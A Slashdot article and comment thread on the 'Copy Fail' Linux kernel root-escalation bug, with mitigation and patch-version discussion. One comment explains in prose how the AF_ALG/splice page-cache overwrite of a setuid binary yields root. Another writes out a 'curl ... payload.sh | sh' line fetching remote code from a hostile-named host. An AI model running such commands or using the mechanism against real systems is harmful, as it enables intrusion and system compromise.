Forgot your password?
Close
typodupeerror
Security Bug Privacy Linux

New Linux 'Copy Fail' Vulnerability Enables Root Access On Major Distros (copy.fail) 74

Posted by BeauHD from the PSA dept.
A newly disclosed Linux kernel flaw dubbed "Copy Fail" can let a local, unprivileged attacker gain root access on major Linux distributions, with researchers claiming the bug affects kernels shipped since 2017. "The POC exploit works out of the box today, but a future version that can escape from containers like Docker is promised soon," writes Slashdot reader tylerni7. "Technical details are available here." Slashdot reader BrianFagioli shares a report from NERDS.xyz: A newly disclosed Linux kernel vulnerability called Copy Fail (CVE-2026-31431) allows an unprivileged user to gain root access using a tiny 732-byte script, and it works with unsettling consistency across major distributions. Unlike older exploits that relied on race conditions or fragile timing, this one is a straight-line logic flaw in the kernel's crypto subsystem. It abuses AF_ALG sockets and splice to overwrite a few bytes in the page cache of a target file, such as /usr/bin/su. Because the kernel executes from the page cache, not directly from disk, the attacker can inject code into a setuid binary in memory and immediately escalate privileges.

What makes this especially concerning is how quiet it is. The file on disk remains unchanged, so standard integrity checks see nothing wrong, while the in-memory version has already been tampered with. The same primitive can also cross container boundaries since the page cache is shared, raising the stakes for multi-tenant environments and Kubernetes nodes. The underlying issue traces back to an in-place optimization added years ago, now being rolled back as part of the fix. Until patched kernels are widely deployed, this is one of those bugs that feels less like a theoretical risk and more like a practical, reliable path to full system compromise.

New Linux 'Copy Fail' Vulnerability Enables Root Access On Major Distros More | Reply

New Linux 'Copy Fail' Vulnerability Enables Root Access On Major Distros

Comments Filter:

  • Temporary mitigation: (Score:3, Informative)

    by Narcocide ( 102829 ) on Thursday April 30, 2026 @07:06PM (#66121270) Homepage

    Blacklist kernel module "algif_aead" ...you probably weren't using it anyway.

  • If an attacker gets this far, you have already messed up. Still should be patched ASAP.

    • Re:Note that this is a local exploit (Score:5, Insightful)

      by 93 Escort Wagon ( 326346 ) on Thursday April 30, 2026 @07:12PM (#66121282)

      If an attacker gets this far, you have already messed up.

      Yes, because there is no such thing as a shared machine.

      Seriously?

    • Re:Note that this is a local exploit (Score:5, Informative)

      by thecombatwombat ( 571826 ) on Thursday April 30, 2026 @07:55PM (#66121344)

      I hate how this reasoning persists. It is just so disconnected from the real world.

      So should large organizations just not bother with least privilege and normal users? Everyone might as well be root, if one with bad intentions gets access to a system, well they should be assumed to just be root anyways?

      I mean, in a company with even 100 people, if one of their accounts gets compromised, or one of them goes rogue, "you have already messed up" really isn't the point. I used to run a data ingest system where we gave limited shell accounts to somewhere around 1,000 clients, plenty of similar but much larger systems are out there. No one *at my company* had messed up in any way if one of those accounts went rogue. Tons of systems like that exist, it's not some edge case.

      • Again, no one saying this is no big deal. What they're saying is not every Dick and Harry off IRC can r00t your box.

        Usually it's people you've already vetted to some degree, whose personal information you have, who will still leave a trace of activity, if you log your system activity remotely, etc. That's a very different scenario from randomly exploiting some system from behind 4 public proxies.

        • Re: (Score:2)

          by gweihir ( 88907 )

          Indeed. It also means that on machines were you have no hostile users, you have more time to patch. One of the most important things in such a such a situation as this is to patch the most vulnerable machines first.

          • Why are you even here? Your advice is worth less than nothing.

            I've got hundreds of servers to secure with thousand of users and you're over here talking about one machine like your advice isn't literally worthless.

            • Re: (Score:1)

              by gweihir ( 88907 )

              You are just an asshole that is so full of yourself that you cannot even read. And obviously an incompetent sysadmin that just scrapes by. I have met tons of them and they are always as arrogant as they are stupid. You fit that well.

      • Everyone might as well be root, if one with bad intentions gets access to a system, well they should be assumed to just be root anyways?

        That's how AWS does it.

        I used to run a data ingest system where we gave limited shell accounts to somewhere around 1,000 clients, plenty of similar but much larger systems are out there. No one *at my company* had messed up in any way if one of those accounts went rogue.

        If they have hacking skills, the "limited shell access" wouldn't be limited long. Giving someone local access is insecure.

      • I hate how this reasoning persists. It is just so disconnected from the real world.

        So should large organizations just not bother with least privilege and normal users? Everyone might as well be root, if one with bad intentions gets access to a system, well they should be assumed to just be root anyways?

        In all fairness privilege escalation vulns are ubiquitous. The execution environment of a general purpose operating system is enormous.

    • Re:Note that this is a local exploit (Score:5, Interesting)

      by sg_oneill ( 159032 ) on Thursday April 30, 2026 @08:07PM (#66121358)

      If an attacker gets this far, you have already messed up. Still should be patched ASAP.

      We've been in the cloud era 15 years now. Docker hosts, Kubernetes pods, Lambdas, Even old fashion cpanel hosts. All of these are at risk, even if the users are otherwise doing everything right.

      • Re: (Score:3)

        by flink ( 18449 )

        We've been in the cloud era 15 years now. Docker hosts, Kubernetes pods, Lambdas, Even old fashion cpanel hosts. All of these are at risk, even if the users are otherwise doing everything right.

        The people who have shell access to the k8s hypervisor or worker nodes probably have root access anyway. Getting root access to the container pods does not buy you much beyond what you get by getting access to the service's shell account. At that point you can already read whatever secrets were injected via environment variables, read application log files, etc.

        The main vulnerability strikes me as being on shared untrusted jump boxes, or like you mentioned, old school cpanel multiuser shell-based hosting

    • Imagine running a research HPC system for academics right now.

      For the vast majority of cases, sure. For some specific types of systems, it's very normal to have only semi-restricted access, folks who like to poke things as regular users and specific interest from big players who'd love access to the research data those users aren't even trying to protect.

    • There was a catastrophic auth bypass CVE for CPanel the same day.

      Chaining is just normal these days.

    • Re:Note that this is a local exploit (Score:4, Insightful)

      by karmawarrior ( 311177 ) on Thursday April 30, 2026 @09:09PM (#66121456) Journal

      It relies upon the ability to run a shell script. So essentially any cascading list of failures can result in this exploit being used. If Chrome has a buffer overflow, you can get root from that. If a library you're using via NPM, Composer, Rubygems, PIP, etc, is ever compromised, you'll be exploitable when you add it to your project, even though you never went near sudo.

      Not to mention the fact that it's become ridiculously popular lately to instruct people to install, for example, new programming languages that are totally safe and built with security in mind *cough* Rust, by getting devs to type things like:

      $ curl -k https://hackmypc.ru/payload.sh | sh -

      (And in Rust's case, they really really want you to do it that way. *SIGH* FFS Rust people! You have a great idea going but you are RUINING it with this type of thing!)

      Anyway, the point is you run arbitrary crap more than you think you do, and even if you didn't, things you rely on do sometimes have problems with them.

      You need to patch this one now.

      • Re: (Score:1)

        by gweihir ( 88907 )

        Which brings me to "you already have screwed up".

        • No, right now it's literally impossible to be a professional in the industry right now and not use something like NPM, Composer, or whatever. Most of us don't have any choice. And likewise, if someone finds an exploit in a common web browser and you don't know this, how the fuck are you supposed to mitigate from it?

    • So might as well spread your cheeks then?

    • If some attack can steal 'root' from you, why are you logging in as 'root' in the first place?

  • The underlying issue traces back to an in-place optimization added years ago, now being rolled back as part of the fix.

    Could they have made that feature a configuration switch instead of hardwiring it in? That way it could be quickly undone if it proved a problem. Or would the branching time to check the switch defeat the purpose of optimization?

  • Yup, this works on our student lab machines (Score:3)

    by 93 Escort Wagon ( 326346 ) on Thursday April 30, 2026 @07:21PM (#66121292)

    Not that I don't trust our students*, but - yeah I see lots of patching in my future...

    *Even without bad intentions, these are engineering students and have been known to try stupid stuff before

  • Immutable Linux distros are superior - especially if the machine is a shared. Almost all the big, regular, mutable distros suck balls - especially Ubuntu.

    • Re: And this is why (Score:4, Informative)

      by Jack Greenbaum ( 7020 ) on Thursday April 30, 2026 @07:31PM (#66121308) Homepage Journal
      Clearly you missed the part about the files on disk not being modified.

      • Re: (Score:2)

        by Bahbus ( 1180627 )

        Doesn't matter. The attack still fails completely.

        • This isn't correct. Immutability won't save you here.

          • Re: (Score:1)

            by Bahbus ( 1180627 )

            Tested it. If it's not the immutability itself, then the ones that are immutable seem to be immune for a different reason. Either way, they're still superior.

            • Re: And this is why (Score:5, Interesting)

              by _0x0nyadesu ( 7184652 ) on Friday May 01, 2026 @12:45AM (#66121660)

              Immutable distros still have writable parts of the disk.

              typically the setup is /usr or the base OS image: read-only / atomically updated /etc: often writable or layered /var: writable /home: writable /tmp: writable
              containers / flatpaks / app data: writable

              and then on top of that you'll still have all of these places where something can put binaries, steal credentials, and hide itself across restarts on your perfect immutable machine /home/ /var/tmp /tmp /var/lib/ /var/cache/ /var/log/
              container writable layers
              upload directories
              SQLite/db files
              app config/state
              user-level systemd/OpenRC/autostart equivalents
              browser/profile dirs
              SSH config/keys if permissions allow

              and that's just desktop workstations. on the server side you've got whatever http(s) server dejour of the day running threads through whatever fcgi nonsense

              and then on a modern corp setup you've got people flying around with claude and codex and therefor npm nonsense flying around everywhere and random node binaries in ps aux compiling random shit

              Look it helps and most immutable distros are so eccentric no one bothers to try to exploit them for realsies but don't expect to be safe until you patch your kernel.

    • "...file on disk remains unchanged...while the in-memory version has already been tampered with..." immutable memory would be a neat trick

      • W^X [wikipedia.org]? As implemented in PaX, Exec Shield, SELinux. Which all Linux distros have and no Linux user ever uninstalls or disables. Or something.

    • Immutability and W^X don't prevent this (Score:4, Informative)

      by Looce ( 1062620 ) * on Thursday April 30, 2026 @08:47PM (#66121420) Journal

      Immutable distributions, in Linux parlance, run on a read-only root filesystem that is swapped for the next boot if there are any updates. Usually, you can use one or more snapshots to roll back to the (or a) previous version if an update fails.

      What this attack is doing is not helped by immutability under that definition: it's entirely in memory and works only as long as the target executable is in memory. It first reads the target executable into the disk cache and asks a specific kernel module to encrypt it with a splice() system call to avoid copying the disk cache page elsewhere. Except that specific kernel module overwrites 4 bytes past the end of its buffer, so if you ask for a 32-byte buffer starting at /usr/bin/su byte 696, you can write bytes 728-731, directly in the system's disk cache. And then you can just keep looping to write any arbitrary string of multiples of 4 bytes into what the kernel considers to be a current copy of the latest data on disk for that file, up to that file's size. It's also not marked as dirty, so it never gets written to disk and only gets evicted with normal disk cache operations.

      Now, while the attack only works as long as the targetted executable is in the disk cache, that's not much of a problem in practice, because the disk cache often survives the few microseconds needed to set up the required system calls. And once you finally execute the binary as setuid root, Linux consults the disk cache, finds it has a version already and runs it. But you now have a root shell, all without a single disk write, and can now begin to remount filesystems read-write to establish persistence.

      Answering a sibling comment, write-xor-execute (W^X) memory doesn't give any protection here either, because a kernel module is performing the write. Write protection on executable pages is provided by the CPU operating in user mode.

      • Re: (Score:2)

        by Bahbus ( 1180627 )

        It seems to not matter, the few immutable distros I tested on prevent the attack from working. Unless they saw the flaw before it was published and patched it themselves.

        • Re: (Score:3)

          by Looce ( 1062620 ) *

          It seems not every distribution ships with the vulnerable module, built-in or loadable, either. That could be another factor, too.

          On my Ubuntu 26.04 host, all patched up to yesterday, lsmod as root shows only algif_hash and algif_skcipher, not algif_aead.

          • Re: (Score:3)

            by Bahbus ( 1180627 )

            Pretty sure I figured it out. The immutable distros I tested have strict security policies that block the exploit. Which still leads me back to immutable distros are superior, because they all seem to have actual security that most of the Linux ecosystem sorely lacks - like anything that still ships with the god awful shit show that is X11.

            • If I tell my local jail broken LLM to work on using this exploit for your specific distro how confident are you that it won't hack it after a few hours of effort?

  • Asleep at the wheel (Score:4, Informative)

    by cen1 ( 2915315 ) on Thursday April 30, 2026 @07:35PM (#66121314)
    So apparently this also allows a container escape and thus the whole k8s cluster is at risk and vulnerable. EKS, GKE all vulnerable.. companies who earn billions from cloud have no fix day 1, yet a community distro of greybeards managed to patch Debian within 24 hours. Coincidentally, RHEL is still not patched while Ubuntu websites are not available due to an apparent massive DDoS For 8h+ now (which can't be a coincidence, someone trying to prevent update rollouts?). What a word to live in.
  • ...  for  office multi-user systems.  For  PCs of single home users -- who would run WinME rather than a multi-user environment -- and nominally insure their  Linux system  with  Dan Wesson not-so-much.  They are very very different worlds.

  • enterprise mitigation (Score:3)

    by markdavis ( 642305 ) on Thursday April 30, 2026 @08:22PM (#66121384)

    For older enterprise distros, this mitigation method:

    # echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
    # rmmod algif_aead

    Does not work because algif_aead is built into the kernels.

    However, this does work:
    # grubby --update-kernel=ALL --args="initcall_blacklist=algif_aead_init"

    Then reboot. It will disable the vulnerable module that is built-in. I am not sure if there are any negative ramifications of having algif_aead disabled, though. Does anyone know?

    Updating to a patched kernel is, of course, the better course.

    See https://seclists.org/oss-sec/2... [seclists.org]

    • >"I am not sure if there are any negative ramifications of having algif_aead disabled, though. Does anyone know?"

      According to my research, it isn't used on most systems.

      "Disabling algif_aead typically does not break anything, as most programs use userspace libraries instead of relying on this kernel module. It is noted that only a few specific applications, like iwd and cryptsetup with certain non-default algorithms, may be affected."

  • Does anyone know the earliest kernel version which contains this vulnerability? I am running Ubuntu 22.04 on my laptop, and I cannot find any kernel updates that address this. I am wondering if the kernel which I am running simply predates this flaw introduction.

  • Discovered With AI (Score:5, Interesting)

    by snookiex ( 1814614 ) on Thursday April 30, 2026 @08:56PM (#66121432) Homepage
    According to the exploit page [copy.fail], it was discovered by an AI-powered product from Xint Code (the ones who supposedly created the exploit). This means several others are rapidly catching up with Mythos (as was to be expected). This could be very good (if software vendors quickly patch their products and make it through the initial wave of reports) or very bad if the deployed systems are not updated (which is the most likely scenario). In any case, I prefer to bite the bullet once and for all and face the tsunami instead of dealing with the uncertainty manipulated by a few tech bros. Either way, this is not going to be nice.

  • The original article was written with AI and it shows.

  • Finally! Thank you. (Score:3)

    by fahrbot-bot ( 874524 ) on Thursday April 30, 2026 @09:23PM (#66121466)

    A way to become root on my single-user home Linux Mint system w/o having to use sudo. :-)

  • That was fast (Score:3)

    by Pezbian ( 1641885 ) on Friday May 01, 2026 @12:31AM (#66121654)

    Microsoft would have buried this kind of thing.
    Apple, too.

    Already fixed here. That was easy.

  • Surprised that a certain vigorous champion of Linux and MacOS hasn't been here yet to boast that this is far less serious than any and all faults in Windows.

    Of course there could be downvoted comments lurking below my threshold but I'm not going to unlock it just to see.

  • This info seems to be relatively hidden to get as summarized form, but since I'm running Gentoo I actually wanted to know what kernel versions are affected...Anyway, here goes. Look for commit 3d14bd48e3a.

    First appeared in 4.14.

    Fixed in:
    7.0+
    6.19.12
    6.18.22
    6.12.85
    6.6.137
    6.1.170
    5.15.204

Slashdot Top Deals

You have mail.

Close